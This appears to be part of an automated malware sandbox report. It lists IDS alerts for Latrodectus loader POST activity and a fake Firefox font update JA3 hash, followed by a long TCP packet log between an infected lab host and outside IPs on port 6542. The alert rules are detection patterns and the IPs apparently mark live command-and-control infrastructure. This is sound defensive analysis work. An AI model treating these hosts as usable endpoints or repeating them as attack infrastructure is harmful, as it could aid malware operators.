2024-12-03T17:46:26.531713+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	50036	104.21.68.89	443	TCP
2024-12-03T17:46:28.179025+0100	2048735	ET MALWARE Latrodectus Loader Related Activity (POST)	1	192.168.2.4	50036	104.21.68.89	443	TCP
2024-12-03T17:46:29.573064+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	50037	104.21.68.89	443	TCP
2024-12-03T17:46:31.178283+0100	2048735	ET MALWARE Latrodectus Loader Related Activity (POST)	1	192.168.2.4	50037	104.21.68.89	443	TCP
2024-12-03T17:46:32.535273+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	50038	104.21.68.89	443	TCP
2024-12-03T17:46:34.164009+0100	2048735	ET MALWARE Latrodectus Loader Related Activity (POST)	1	192.168.2.4	50038	104.21.68.89	443	TCP
2024-12-03T17:46:35.482631+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	50039	104.21.68.89	443	TCP
2024-12-03T17:46:37.154947+0100	2048735	ET MALWARE Latrodectus Loader Related Activity (POST)	1	192.168.2.4	50039	104.21.68.89	443	TCP
2024-12-03T17:46:38.669901+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	50040	104.21.68.89	443	TCP
2024-12-03T17:46:40.295686+0100	2048735	ET MALWARE Latrodectus Loader Related Activity (POST)	1	192.168.2.4	50040	104.21.68.89	443	TCP
2024-12-03T17:46:41.921134+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	50041	104.21.68.89	443	TCP
2024-12-03T17:46:43.513199+0100	2048735	ET MALWARE Latrodectus Loader Related Activity (POST)	1	192.168.2.4	50041	104.21.68.89	443	TCP
2024-12-03T17:46:44.882994+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	50042	104.21.68.89	443	TCP
2024-12-03T17:46:46.549587+0100	2048735	ET MALWARE Latrodectus Loader Related Activity (POST)	1	192.168.2.4	50042	104.21.68.89	443	TCP
2024-12-03T17:46:47.937903+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	50043	104.21.68.89	443	TCP
2024-12-03T17:46:49.573431+0100	2048735	ET MALWARE Latrodectus Loader Related Activity (POST)	1	192.168.2.4	50043	104.21.68.89	443	TCP
2024-12-03T17:46:50.975118+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	50044	104.21.68.89	443	TCP
2024-12-03T17:46:52.624897+0100	2048735	ET MALWARE Latrodectus Loader Related Activity (POST)	1	192.168.2.4	50044	104.21.68.89	443	TCP
2024-12-03T17:46:54.009056+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	50045	104.21.68.89	443	TCP
2024-12-03T17:46:55.621124+0100	2048735	ET MALWARE Latrodectus Loader Related Activity (POST)	1	192.168.2.4	50045	104.21.68.89	443	TCP
2024-12-03T17:46:56.971792+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	50046	104.21.68.89	443	TCP
2024-12-03T17:46:58.640678+0100	2048735	ET MALWARE Latrodectus Loader Related Activity (POST)	1	192.168.2.4	50046	104.21.68.89	443	TCP
2024-12-03T17:47:00.013389+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	50047	104.21.68.89	443	TCP
2024-12-03T17:47:01.667227+0100	2048735	ET MALWARE Latrodectus Loader Related Activity (POST)	1	192.168.2.4	50047	104.21.68.89	443	TCP
2024-12-03T17:47:03.056418+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	50048	104.21.68.89	443	TCP
2024-12-03T17:47:04.446766+0100	2048735	ET MALWARE Latrodectus Loader Related Activity (POST)	1	192.168.2.4	50048	104.21.68.89	443	TCP
2024-12-03T17:47:05.980918+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	50049	104.21.68.89	443	TCP
2024-12-03T17:47:07.616711+0100	2048735	ET MALWARE Latrodectus Loader Related Activity (POST)	1	192.168.2.4	50049	104.21.68.89	443	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 3, 2024 17:43:06.016762972 CET	49730	6542	192.168.2.4	103.57.249.207
Dec 3, 2024 17:43:06.139949083 CET	6542	49730	103.57.249.207	192.168.2.4
Dec 3, 2024 17:43:06.140014887 CET	49730	6542	192.168.2.4	103.57.249.207
Dec 3, 2024 17:43:06.147629023 CET	49730	6542	192.168.2.4	103.57.249.207
Dec 3, 2024 17:43:06.268002987 CET	6542	49730	103.57.249.207	192.168.2.4
Dec 3, 2024 17:43:08.061969042 CET	6542	49730	103.57.249.207	192.168.2.4
Dec 3, 2024 17:43:08.062032938 CET	49730	6542	192.168.2.4	103.57.249.207
Dec 3, 2024 17:43:08.066817045 CET	6542	49730	103.57.249.207	192.168.2.4
Dec 3, 2024 17:43:08.066832066 CET	6542	49730	103.57.249.207	192.168.2.4
Dec 3, 2024 17:43:08.066869020 CET	49730	6542	192.168.2.4	103.57.249.207
Dec 3, 2024 17:43:08.066888094 CET	49730	6542	192.168.2.4	103.57.249.207
Dec 3, 2024 17:43:08.110405922 CET	49730	6542	192.168.2.4	103.57.249.207
Dec 3, 2024 17:43:08.230525970 CET	6542	49730	103.57.249.207	192.168.2.4
Dec 3, 2024 17:43:08.676335096 CET	6542	49730	103.57.249.207	192.168.2.4
Dec 3, 2024 17:43:08.676435947 CET	49730	6542	192.168.2.4	103.57.249.207
Dec 3, 2024 17:43:08.689044952 CET	49730	6542	192.168.2.4	103.57.249.207
Dec 3, 2024 17:43:08.809200048 CET	6542	49730	103.57.249.207	192.168.2.4
Dec 3, 2024 17:43:17.184348106 CET	6542	49730	103.57.249.207	192.168.2.4
Dec 3, 2024 17:43:17.184442043 CET	49730	6542	192.168.2.4	103.57.249.207
Dec 3, 2024 17:43:17.561731100 CET	49732	6542	192.168.2.4	94.232.43.224
Dec 3, 2024 17:43:17.681885958 CET	6542	49732	94.232.43.224	192.168.2.4
Dec 3, 2024 17:43:17.681982040 CET	49732	6542	192.168.2.4	94.232.43.224
Dec 3, 2024 17:43:17.682466984 CET	49732	6542	192.168.2.4	94.232.43.224
Dec 3, 2024 17:43:17.802747011 CET	6542	49732	94.232.43.224	192.168.2.4
Dec 3, 2024 17:43:19.090677977 CET	6542	49732	94.232.43.224	192.168.2.4
Dec 3, 2024 17:43:19.090761900 CET	49732	6542	192.168.2.4	94.232.43.224
Dec 3, 2024 17:43:19.090871096 CET	6542	49732	94.232.43.224	192.168.2.4
Dec 3, 2024 17:43:19.090912104 CET	49732	6542	192.168.2.4	94.232.43.224
Dec 3, 2024 17:43:19.091170073 CET	6542	49732	94.232.43.224	192.168.2.4
Dec 3, 2024 17:43:19.091212988 CET	49732	6542	192.168.2.4	94.232.43.224
Dec 3, 2024 17:43:19.099776983 CET	49732	6542	192.168.2.4	94.232.43.224
Dec 3, 2024 17:43:19.219747066 CET	6542	49732	94.232.43.224	192.168.2.4
Dec 3, 2024 17:43:19.508708954 CET	6542	49732	94.232.43.224	192.168.2.4
Dec 3, 2024 17:43:19.508821011 CET	49732	6542	192.168.2.4	94.232.43.224
Dec 3, 2024 17:43:19.509927988 CET	49732	6542	192.168.2.4	94.232.43.224
Dec 3, 2024 17:43:19.630773067 CET	6542	49732	94.232.43.224	192.168.2.4
Dec 3, 2024 17:43:24.128890991 CET	6542	49732	94.232.43.224	192.168.2.4
Dec 3, 2024 17:43:24.128984928 CET	49732	6542	192.168.2.4	94.232.43.224
Dec 3, 2024 17:43:24.129041910 CET	6542	49732	94.232.43.224	192.168.2.4
Dec 3, 2024 17:43:24.129177094 CET	49732	6542	192.168.2.4	94.232.43.224
Dec 3, 2024 17:43:24.129374981 CET	6542	49732	94.232.43.224	192.168.2.4
Dec 3, 2024 17:43:24.129386902 CET	6542	49732	94.232.43.224	192.168.2.4
Dec 3, 2024 17:43:24.129420996 CET	49732	6542	192.168.2.4	94.232.43.224
Dec 3, 2024 17:43:24.130055904 CET	6542	49732	94.232.43.224	192.168.2.4
Dec 3, 2024 17:43:24.130068064 CET	6542	49732	94.232.43.224	192.168.2.4
Dec 3, 2024 17:43:24.130104065 CET	49732	6542	192.168.2.4	94.232.43.224
Dec 3, 2024 17:43:24.137327909 CET	6542	49732	94.232.43.224	192.168.2.4
Dec 3, 2024 17:43:24.137399912 CET	49732	6542	192.168.2.4	94.232.43.224
Dec 3, 2024 17:43:24.140063047 CET	6542	49732	94.232.43.224	192.168.2.4
Dec 3, 2024 17:43:24.140113115 CET	49732	6542	192.168.2.4	94.232.43.224
Dec 3, 2024 17:43:24.140343904 CET	6542	49732	94.232.43.224	192.168.2.4
Dec 3, 2024 17:43:24.140383005 CET	49732	6542	192.168.2.4	94.232.43.224
Dec 3, 2024 17:43:24.148354053 CET	6542	49732	94.232.43.224	192.168.2.4
Dec 3, 2024 17:43:24.148422003 CET	49732	6542	192.168.2.4	94.232.43.224
Dec 3, 2024 17:43:24.148499012 CET	6542	49732	94.232.43.224	192.168.2.4
Dec 3, 2024 17:43:24.148538113 CET	49732	6542	192.168.2.4	94.232.43.224
Dec 3, 2024 17:43:24.156982899 CET	6542	49732	94.232.43.224	192.168.2.4
Dec 3, 2024 17:43:24.157068014 CET	49732	6542	192.168.2.4	94.232.43.224
Dec 3, 2024 17:43:24.157125950 CET	6542	49732	94.232.43.224	192.168.2.4
Dec 3, 2024 17:43:24.157167912 CET	49732	6542	192.168.2.4	94.232.43.224
Dec 3, 2024 17:43:24.211536884 CET	6542	49732	94.232.43.224	192.168.2.4
Dec 3, 2024 17:43:24.211725950 CET	49732	6542	192.168.2.4	94.232.43.224
Dec 3, 2024 17:43:24.249851942 CET	6542	49732	94.232.43.224	192.168.2.4
Dec 3, 2024 17:43:24.249912977 CET	49732	6542	192.168.2.4	94.232.43.224
Dec 3, 2024 17:43:24.249982119 CET	6542	49732	94.232.43.224	192.168.2.4
Dec 3, 2024 17:43:24.250025988 CET	49732	6542	192.168.2.4	94.232.43.224
Dec 3, 2024 17:43:24.339747906 CET	6542	49732	94.232.43.224	192.168.2.4
Dec 3, 2024 17:43:24.339822054 CET	49732	6542	192.168.2.4	94.232.43.224
Dec 3, 2024 17:43:24.339884043 CET	6542	49732	94.232.43.224	192.168.2.4
Dec 3, 2024 17:43:24.340054035 CET	49732	6542	192.168.2.4	94.232.43.224
Dec 3, 2024 17:43:24.343729019 CET	6542	49732	94.232.43.224	192.168.2.4
Dec 3, 2024 17:43:24.343775988 CET	49732	6542	192.168.2.4	94.232.43.224
Dec 3, 2024 17:43:24.343894958 CET	6542	49732	94.232.43.224	192.168.2.4
Dec 3, 2024 17:43:24.343933105 CET	49732	6542	192.168.2.4	94.232.43.224
Dec 3, 2024 17:43:24.351908922 CET	6542	49732	94.232.43.224	192.168.2.4
Dec 3, 2024 17:43:24.351922035 CET	6542	49732	94.232.43.224	192.168.2.4
Dec 3, 2024 17:43:24.351959944 CET	49732	6542	192.168.2.4	94.232.43.224
Dec 3, 2024 17:43:24.359697104 CET	6542	49732	94.232.43.224	192.168.2.4
Dec 3, 2024 17:43:24.359746933 CET	49732	6542	192.168.2.4	94.232.43.224
Dec 3, 2024 17:43:24.359873056 CET	6542	49732	94.232.43.224	192.168.2.4
Dec 3, 2024 17:43:24.359914064 CET	49732	6542	192.168.2.4	94.232.43.224
Dec 3, 2024 17:43:24.367743015 CET	6542	49732	94.232.43.224	192.168.2.4
Dec 3, 2024 17:43:24.367791891 CET	49732	6542	192.168.2.4	94.232.43.224
Dec 3, 2024 17:43:24.367906094 CET	6542	49732	94.232.43.224	192.168.2.4
Dec 3, 2024 17:43:24.367947102 CET	49732	6542	192.168.2.4	94.232.43.224
Dec 3, 2024 17:43:24.376039028 CET	6542	49732	94.232.43.224	192.168.2.4
Dec 3, 2024 17:43:24.376085043 CET	49732	6542	192.168.2.4	94.232.43.224
Dec 3, 2024 17:43:24.376127958 CET	6542	49732	94.232.43.224	192.168.2.4
Dec 3, 2024 17:43:24.376167059 CET	49732	6542	192.168.2.4	94.232.43.224
Dec 3, 2024 17:43:24.383630037 CET	6542	49732	94.232.43.224	192.168.2.4
Dec 3, 2024 17:43:24.383675098 CET	49732	6542	192.168.2.4	94.232.43.224
Dec 3, 2024 17:43:24.383780956 CET	6542	49732	94.232.43.224	192.168.2.4
Dec 3, 2024 17:43:24.383821964 CET	49732	6542	192.168.2.4	94.232.43.224
Dec 3, 2024 17:43:24.391675949 CET	6542	49732	94.232.43.224	192.168.2.4
Dec 3, 2024 17:43:24.391725063 CET	49732	6542	192.168.2.4	94.232.43.224
Dec 3, 2024 17:43:24.391822100 CET	6542	49732	94.232.43.224	192.168.2.4
Dec 3, 2024 17:43:24.391860962 CET	49732	6542	192.168.2.4	94.232.43.224
Dec 3, 2024 17:43:24.397229910 CET	6542	49732	94.232.43.224	192.168.2.4
Dec 3, 2024 17:43:24.397281885 CET	49732	6542	192.168.2.4	94.232.43.224
Dec 3, 2024 17:43:24.397403002 CET	6542	49732	94.232.43.224	192.168.2.4
Dec 3, 2024 17:43:24.397440910 CET	49732	6542	192.168.2.4	94.232.43.224
Dec 3, 2024 17:43:24.402895927 CET	6542	49732	94.232.43.224	192.168.2.4
Dec 3, 2024 17:43:24.402940035 CET	49732	6542	192.168.2.4	94.232.43.224
Dec 3, 2024 17:43:24.403074026 CET	6542	49732	94.232.43.224	192.168.2.4
Dec 3, 2024 17:43:24.403115034 CET	49732	6542	192.168.2.4	94.232.43.224
Dec 3, 2024 17:43:24.408575058 CET	6542	49732	94.232.43.224	192.168.2.4
Dec 3, 2024 17:43:24.408627987 CET	49732	6542	192.168.2.4	94.232.43.224
Dec 3, 2024 17:43:24.408756018 CET	6542	49732	94.232.43.224	192.168.2.4
Dec 3, 2024 17:43:24.408797979 CET	49732	6542	192.168.2.4	94.232.43.224
Dec 3, 2024 17:43:24.414486885 CET	6542	49732	94.232.43.224	192.168.2.4
Dec 3, 2024 17:43:24.414540052 CET	49732	6542	192.168.2.4	94.232.43.224
Dec 3, 2024 17:43:24.414592981 CET	6542	49732	94.232.43.224	192.168.2.4
Dec 3, 2024 17:43:24.414632082 CET	49732	6542	192.168.2.4	94.232.43.224
Dec 3, 2024 17:43:24.423015118 CET	6542	49732	94.232.43.224	192.168.2.4
Dec 3, 2024 17:43:24.423063993 CET	49732	6542	192.168.2.4	94.232.43.224
Dec 3, 2024 17:43:24.423192024 CET	6542	49732	94.232.43.224	192.168.2.4
Dec 3, 2024 17:43:24.423230886 CET	49732	6542	192.168.2.4	94.232.43.224
Dec 3, 2024 17:43:24.425935984 CET	6542	49732	94.232.43.224	192.168.2.4
Dec 3, 2024 17:43:24.425992966 CET	49732	6542	192.168.2.4	94.232.43.224
Dec 3, 2024 17:43:24.426085949 CET	6542	49732	94.232.43.224	192.168.2.4
Dec 3, 2024 17:43:24.426125050 CET	49732	6542	192.168.2.4	94.232.43.224
Dec 3, 2024 17:43:24.429960012 CET	6542	49732	94.232.43.224	192.168.2.4
Dec 3, 2024 17:43:24.430016041 CET	49732	6542	192.168.2.4	94.232.43.224
Dec 3, 2024 17:43:24.430061102 CET	6542	49732	94.232.43.224	192.168.2.4
Dec 3, 2024 17:43:24.430102110 CET	49732	6542	192.168.2.4	94.232.43.224
Dec 3, 2024 17:43:24.555982113 CET	6542	49732	94.232.43.224	192.168.2.4
Dec 3, 2024 17:43:24.556046009 CET	49732	6542	192.168.2.4	94.232.43.224
Dec 3, 2024 17:43:24.556140900 CET	6542	49732	94.232.43.224	192.168.2.4
Dec 3, 2024 17:43:24.556190014 CET	49732	6542	192.168.2.4	94.232.43.224
Dec 3, 2024 17:43:24.558032036 CET	6542	49732	94.232.43.224	192.168.2.4
Dec 3, 2024 17:43:24.558085918 CET	49732	6542	192.168.2.4	94.232.43.224
Dec 3, 2024 17:43:24.558288097 CET	6542	49732	94.232.43.224	192.168.2.4
Dec 3, 2024 17:43:24.560729980 CET	49732	6542	192.168.2.4	94.232.43.224
Dec 3, 2024 17:43:24.561386108 CET	6542	49732	94.232.43.224	192.168.2.4
Dec 3, 2024 17:43:24.561441898 CET	49732	6542	192.168.2.4	94.232.43.224
Dec 3, 2024 17:43:24.561497927 CET	6542	49732	94.232.43.224	192.168.2.4
Dec 3, 2024 17:43:24.561539888 CET	49732	6542	192.168.2.4	94.232.43.224
Dec 3, 2024 17:43:24.565578938 CET	6542	49732	94.232.43.224	192.168.2.4
Dec 3, 2024 17:43:24.565836906 CET	6542	49732	94.232.43.224	192.168.2.4
Dec 3, 2024 17:43:24.565898895 CET	49732	6542	192.168.2.4	94.232.43.224
Dec 3, 2024 17:43:24.569658041 CET	6542	49732	94.232.43.224	192.168.2.4
Dec 3, 2024 17:43:24.569825888 CET	49732	6542	192.168.2.4	94.232.43.224
Dec 3, 2024 17:43:24.569866896 CET	6542	49732	94.232.43.224	192.168.2.4
Dec 3, 2024 17:43:24.569911003 CET	49732	6542	192.168.2.4	94.232.43.224
Dec 3, 2024 17:43:24.573860884 CET	6542	49732	94.232.43.224	192.168.2.4
Dec 3, 2024 17:43:24.574039936 CET	6542	49732	94.232.43.224	192.168.2.4
Dec 3, 2024 17:43:24.574095011 CET	49732	6542	192.168.2.4	94.232.43.224
Dec 3, 2024 17:43:24.578125954 CET	6542	49732	94.232.43.224	192.168.2.4
Dec 3, 2024 17:43:24.578176975 CET	49732	6542	192.168.2.4	94.232.43.224
Dec 3, 2024 17:43:24.578324080 CET	6542	49732	94.232.43.224	192.168.2.4
Dec 3, 2024 17:43:24.578377008 CET	49732	6542	192.168.2.4	94.232.43.224
Dec 3, 2024 17:43:24.582331896 CET	6542	49732	94.232.43.224	192.168.2.4
Dec 3, 2024 17:43:24.582381010 CET	49732	6542	192.168.2.4	94.232.43.224
Dec 3, 2024 17:43:24.582467079 CET	6542	49732	94.232.43.224	192.168.2.4
Dec 3, 2024 17:43:24.582901001 CET	49732	6542	192.168.2.4	94.232.43.224
Dec 3, 2024 17:43:24.586550951 CET	6542	49732	94.232.43.224	192.168.2.4
Dec 3, 2024 17:43:24.586643934 CET	49732	6542	192.168.2.4	94.232.43.224
Dec 3, 2024 17:43:24.586711884 CET	6542	49732	94.232.43.224	192.168.2.4
Dec 3, 2024 17:43:24.586850882 CET	49732	6542	192.168.2.4	94.232.43.224
Dec 3, 2024 17:43:24.590856075 CET	6542	49732	94.232.43.224	192.168.2.4
Dec 3, 2024 17:43:24.590933084 CET	49732	6542	192.168.2.4	94.232.43.224
Dec 3, 2024 17:43:24.591083050 CET	6542	49732	94.232.43.224	192.168.2.4
Dec 3, 2024 17:43:24.591125965 CET	49732	6542	192.168.2.4	94.232.43.224
Dec 3, 2024 17:43:24.594981909 CET	6542	49732	94.232.43.224	192.168.2.4
Dec 3, 2024 17:43:24.595118046 CET	6542	49732	94.232.43.224	192.168.2.4
Dec 3, 2024 17:43:24.595161915 CET	49732	6542	192.168.2.4	94.232.43.224
Dec 3, 2024 17:43:24.599191904 CET	6542	49732	94.232.43.224	192.168.2.4
Dec 3, 2024 17:43:24.599245071 CET	49732	6542	192.168.2.4	94.232.43.224
Dec 3, 2024 17:43:24.599338055 CET	6542	49732	94.232.43.224	192.168.2.4
Dec 3, 2024 17:43:24.599376917 CET	49732	6542	192.168.2.4	94.232.43.224
Dec 3, 2024 17:43:24.603497982 CET	6542	49732	94.232.43.224	192.168.2.4
Dec 3, 2024 17:43:24.603554010 CET	49732	6542	192.168.2.4	94.232.43.224
Dec 3, 2024 17:43:24.603657961 CET	6542	49732	94.232.43.224	192.168.2.4
Dec 3, 2024 17:43:24.603769064 CET	49732	6542	192.168.2.4	94.232.43.224
Dec 3, 2024 17:43:24.607573986 CET	6542	49732	94.232.43.224	192.168.2.4
Dec 3, 2024 17:43:24.607743979 CET	6542	49732	94.232.43.224	192.168.2.4
Dec 3, 2024 17:43:24.607860088 CET	49732	6542	192.168.2.4	94.232.43.224
Dec 3, 2024 17:43:24.611792088 CET	6542	49732	94.232.43.224	192.168.2.4
Dec 3, 2024 17:43:24.611965895 CET	6542	49732	94.232.43.224	192.168.2.4
Dec 3, 2024 17:43:24.612030029 CET	49732	6542	192.168.2.4	94.232.43.224
Dec 3, 2024 17:43:24.616008997 CET	6542	49732	94.232.43.224	192.168.2.4
Dec 3, 2024 17:43:24.616144896 CET	6542	49732	94.232.43.224	192.168.2.4
Dec 3, 2024 17:43:24.616214991 CET	49732	6542	192.168.2.4	94.232.43.224
Dec 3, 2024 17:43:24.620206118 CET	6542	49732	94.232.43.224	192.168.2.4
Dec 3, 2024 17:43:24.620414019 CET	6542	49732	94.232.43.224	192.168.2.4
Dec 3, 2024 17:43:24.620462894 CET	49732	6542	192.168.2.4	94.232.43.224
Dec 3, 2024 17:43:24.624387980 CET	6542	49732	94.232.43.224	192.168.2.4
Dec 3, 2024 17:43:24.624694109 CET	6542	49732	94.232.43.224	192.168.2.4
Dec 3, 2024 17:43:24.624742985 CET	49732	6542	192.168.2.4	94.232.43.224
Dec 3, 2024 17:43:24.628654957 CET	6542	49732	94.232.43.224	192.168.2.4
Dec 3, 2024 17:43:24.628827095 CET	6542	49732	94.232.43.224	192.168.2.4
Dec 3, 2024 17:43:24.628875017 CET	49732	6542	192.168.2.4	94.232.43.224
Dec 3, 2024 17:43:24.632930040 CET	6542	49732	94.232.43.224	192.168.2.4
Dec 3, 2024 17:43:24.633117914 CET	6542	49732	94.232.43.224	192.168.2.4
Dec 3, 2024 17:43:24.633167982 CET	49732	6542	192.168.2.4	94.232.43.224
Dec 3, 2024 17:43:24.637202978 CET	6542	49732	94.232.43.224	192.168.2.4
Dec 3, 2024 17:43:24.637254953 CET	6542	49732	94.232.43.224	192.168.2.4
Dec 3, 2024 17:43:24.637367964 CET	49732	6542	192.168.2.4	94.232.43.224
Dec 3, 2024 17:43:24.676139116 CET	6542	49732	94.232.43.224	192.168.2.4
Dec 3, 2024 17:43:24.676373959 CET	6542	49732	94.232.43.224	192.168.2.4
Dec 3, 2024 17:43:24.676486969 CET	49732	6542	192.168.2.4	94.232.43.224
Dec 3, 2024 17:43:24.678174973 CET	6542	49732	94.232.43.224	192.168.2.4
Dec 3, 2024 17:43:24.679019928 CET	6542	49732	94.232.43.224	192.168.2.4
Dec 3, 2024 17:43:24.679073095 CET	49732	6542	192.168.2.4	94.232.43.224
Dec 3, 2024 17:43:24.679239035 CET	6542	49732	94.232.43.224	192.168.2.4
Dec 3, 2024 17:43:24.679280043 CET	49732	6542	192.168.2.4	94.232.43.224
Dec 3, 2024 17:43:24.683197975 CET	6542	49732	94.232.43.224	192.168.2.4
Dec 3, 2024 17:43:24.683262110 CET	49732	6542	192.168.2.4	94.232.43.224
Dec 3, 2024 17:43:24.683440924 CET	6542	49732	94.232.43.224	192.168.2.4
Dec 3, 2024 17:43:24.683480978 CET	49732	6542	192.168.2.4	94.232.43.224
Dec 3, 2024 17:43:24.687429905 CET	6542	49732	94.232.43.224	192.168.2.4
Dec 3, 2024 17:43:24.687623978 CET	6542	49732	94.232.43.224	192.168.2.4
Dec 3, 2024 17:43:24.687669992 CET	49732	6542	192.168.2.4	94.232.43.224
Dec 3, 2024 17:43:24.691605091 CET	6542	49732	94.232.43.224	192.168.2.4
Dec 3, 2024 17:43:24.691725969 CET	6542	49732	94.232.43.224	192.168.2.4
Dec 3, 2024 17:43:24.691783905 CET	49732	6542	192.168.2.4	94.232.43.224
Dec 3, 2024 17:43:24.766482115 CET	6542	49732	94.232.43.224	192.168.2.4
Dec 3, 2024 17:43:24.766717911 CET	6542	49732	94.232.43.224	192.168.2.4
Dec 3, 2024 17:43:24.766774893 CET	49732	6542	192.168.2.4	94.232.43.224
Dec 3, 2024 17:43:24.768589973 CET	6542	49732	94.232.43.224	192.168.2.4
Dec 3, 2024 17:43:24.768656969 CET	49732	6542	192.168.2.4	94.232.43.224
Dec 3, 2024 17:43:24.768815041 CET	6542	49732	94.232.43.224	192.168.2.4
Dec 3, 2024 17:43:24.769073963 CET	49732	6542	192.168.2.4	94.232.43.224
Dec 3, 2024 17:43:24.771589041 CET	6542	49732	94.232.43.224	192.168.2.4
Dec 3, 2024 17:43:24.771735907 CET	6542	49732	94.232.43.224	192.168.2.4
Dec 3, 2024 17:43:24.771781921 CET	49732	6542	192.168.2.4	94.232.43.224
Dec 3, 2024 17:43:24.775134087 CET	6542	49732	94.232.43.224	192.168.2.4
Dec 3, 2024 17:43:24.775182962 CET	49732	6542	192.168.2.4	94.232.43.224
Dec 3, 2024 17:43:24.775363922 CET	6542	49732	94.232.43.224	192.168.2.4
Dec 3, 2024 17:43:24.777997017 CET	49732	6542	192.168.2.4	94.232.43.224
Dec 3, 2024 17:43:24.778428078 CET	6542	49732	94.232.43.224	192.168.2.4
Dec 3, 2024 17:43:24.778939009 CET	6542	49732	94.232.43.224	192.168.2.4
Dec 3, 2024 17:43:24.778964996 CET	49732	6542	192.168.2.4	94.232.43.224
Dec 3, 2024 17:43:24.778985977 CET	49732	6542	192.168.2.4	94.232.43.224
Dec 3, 2024 17:43:24.781666994 CET	6542	49732	94.232.43.224	192.168.2.4
Dec 3, 2024 17:43:24.781838894 CET	6542	49732	94.232.43.224	192.168.2.4
Dec 3, 2024 17:43:24.781884909 CET	49732	6542	192.168.2.4	94.232.43.224
Dec 3, 2024 17:43:24.785202026 CET	6542	49732	94.232.43.224	192.168.2.4
Dec 3, 2024 17:43:24.785252094 CET	49732	6542	192.168.2.4	94.232.43.224
Dec 3, 2024 17:43:24.785413980 CET	6542	49732	94.232.43.224	192.168.2.4
Dec 3, 2024 17:43:24.785454988 CET	49732	6542	192.168.2.4	94.232.43.224
Dec 3, 2024 17:43:24.788445950 CET	6542	49732	94.232.43.224	192.168.2.4
Dec 3, 2024 17:43:24.788511038 CET	49732	6542	192.168.2.4	94.232.43.224
Dec 3, 2024 17:43:24.788606882 CET	6542	49732	94.232.43.224	192.168.2.4
Dec 3, 2024 17:43:24.788652897 CET	49732	6542	192.168.2.4	94.232.43.224
Dec 3, 2024 17:43:24.791915894 CET	6542	49732	94.232.43.224	192.168.2.4
Dec 3, 2024 17:43:24.791975975 CET	49732	6542	192.168.2.4	94.232.43.224
Dec 3, 2024 17:43:24.792120934 CET	6542	49732	94.232.43.224	192.168.2.4
Dec 3, 2024 17:43:24.792164087 CET	49732	6542	192.168.2.4	94.232.43.224
Dec 3, 2024 17:43:24.795056105 CET	6542	49732	94.232.43.224	192.168.2.4
Dec 3, 2024 17:43:24.795100927 CET	49732	6542	192.168.2.4	94.232.43.224
Dec 3, 2024 17:43:24.795195103 CET	6542	49732	94.232.43.224	192.168.2.4
Dec 3, 2024 17:43:24.795236111 CET	49732	6542	192.168.2.4	94.232.43.224
Dec 3, 2024 17:43:24.798394918 CET	6542	49732	94.232.43.224	192.168.2.4
Dec 3, 2024 17:43:24.798593044 CET	6542	49732	94.232.43.224	192.168.2.4
Dec 3, 2024 17:43:24.798659086 CET	49732	6542	192.168.2.4	94.232.43.224
Dec 3, 2024 17:43:24.801805019 CET	6542	49732	94.232.43.224	192.168.2.4
Dec 3, 2024 17:43:24.801866055 CET	49732	6542	192.168.2.4	94.232.43.224
Dec 3, 2024 17:43:24.801995993 CET	6542	49732	94.232.43.224	192.168.2.4
Dec 3, 2024 17:43:24.805099010 CET	49732	6542	192.168.2.4	94.232.43.224
Dec 3, 2024 17:43:24.805181026 CET	6542	49732	94.232.43.224	192.168.2.4
Dec 3, 2024 17:43:24.805294037 CET	6542	49732	94.232.43.224	192.168.2.4
Dec 3, 2024 17:43:24.805340052 CET	49732	6542	192.168.2.4	94.232.43.224
Dec 3, 2024 17:43:24.807131052 CET	6542	49732	94.232.43.224	192.168.2.4
Dec 3, 2024 17:43:24.807323933 CET	6542	49732	94.232.43.224	192.168.2.4
Dec 3, 2024 17:43:24.807369947 CET	49732	6542	192.168.2.4	94.232.43.224
Dec 3, 2024 17:43:24.809065104 CET	6542	49732	94.232.43.224	192.168.2.4
Dec 3, 2024 17:43:24.809113979 CET	49732	6542	192.168.2.4	94.232.43.224
Dec 3, 2024 17:43:24.809191942 CET	6542	49732	94.232.43.224	192.168.2.4
Dec 3, 2024 17:43:24.809317112 CET	49732	6542	192.168.2.4	94.232.43.224
Dec 3, 2024 17:43:24.810902119 CET	6542	49732	94.232.43.224	192.168.2.4
Dec 3, 2024 17:43:24.811084986 CET	6542	49732	94.232.43.224	192.168.2.4
Dec 3, 2024 17:43:24.811131954 CET	49732	6542	192.168.2.4	94.232.43.224
Dec 3, 2024 17:43:24.812827110 CET	6542	49732	94.232.43.224	192.168.2.4
Dec 3, 2024 17:43:24.812975883 CET	6542	49732	94.232.43.224	192.168.2.4
Dec 3, 2024 17:43:24.813030005 CET	49732	6542	192.168.2.4	94.232.43.224
Dec 3, 2024 17:43:24.814697027 CET	6542	49732	94.232.43.224	192.168.2.4
Dec 3, 2024 17:43:24.814899921 CET	6542	49732	94.232.43.224	192.168.2.4
Dec 3, 2024 17:43:24.814943075 CET	49732	6542	192.168.2.4	94.232.43.224
Dec 3, 2024 17:43:24.816597939 CET	6542	49732	94.232.43.224	192.168.2.4
Dec 3, 2024 17:43:24.816643000 CET	49732	6542	192.168.2.4	94.232.43.224
Dec 3, 2024 17:43:24.816775084 CET	6542	49732	94.232.43.224	192.168.2.4
Dec 3, 2024 17:43:24.817127943 CET	49732	6542	192.168.2.4	94.232.43.224
Dec 3, 2024 17:43:24.818516970 CET	6542	49732	94.232.43.224	192.168.2.4
